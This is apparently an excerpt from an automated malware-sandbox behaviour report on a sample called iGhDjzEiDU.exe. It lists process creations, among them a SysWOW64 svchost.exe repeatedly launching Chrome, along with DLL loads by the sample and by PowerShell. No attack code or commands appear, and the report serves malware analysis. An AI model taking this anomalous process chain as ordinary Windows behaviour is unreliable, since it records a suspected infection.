                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: twext.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: shacct.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: idstore.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeSection loaded: textshaping.dllJump to behavior
